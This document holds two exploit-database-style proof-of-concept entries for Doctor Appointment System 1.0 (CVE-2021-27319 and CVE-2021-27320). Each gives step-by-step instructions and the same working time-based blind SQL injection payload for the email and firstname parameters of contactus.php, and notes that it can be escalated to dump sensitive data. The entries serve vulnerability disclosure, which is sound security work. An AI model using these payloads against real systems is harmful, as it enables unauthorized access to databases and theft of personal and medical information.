# Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in email parameter # Date: 03-03-2021 # CVE: CVE-2021-27319 # Exploit Author: Nakul Ratti # Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html # Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html # Version: V1.0 Vulnerable File: ---------------- http://host/doctorappointment/contactus.php Vulnerable Issue: ----------------- email parameter has no input validation POC: ---- 1] Navigate to http://host/doctorappointment/contactus.php 2] In the email parameter enter following payload to exploit blind SQL Injection: '+AND+(SELECT+7827+FROM+(SELECT(SLEEP(10)))xEII)+AND+'1'%3d'1 3] This can further be escalated to dump sensitive information from the database ------------------ # Exploit Title: Doctor Appointment System 1.0 Blind SQL injection in firstname parameter # Date: 03-03-2021 # CVE: CVE-2021-27320 # Exploit Author: Nakul Ratti # Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html # Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html # Version: V1.0 Vulnerable File: ---------------- http://host/doctorappointment/contactus.php Vulnerable Issue: ----------------- firstname parameter has no input validation POC: ---- 1] Navigate to http://host/doctorappointment/contactus.php 2] In the firstname parameter enter following payload to exploit blind SQL Injection: '+AND+(SELECT+7827+FROM+(SELECT(SLEEP(10)))xEII)+AND+'1'%3d'1 3] This can further be escalated to dump sensitive information from the database ------------------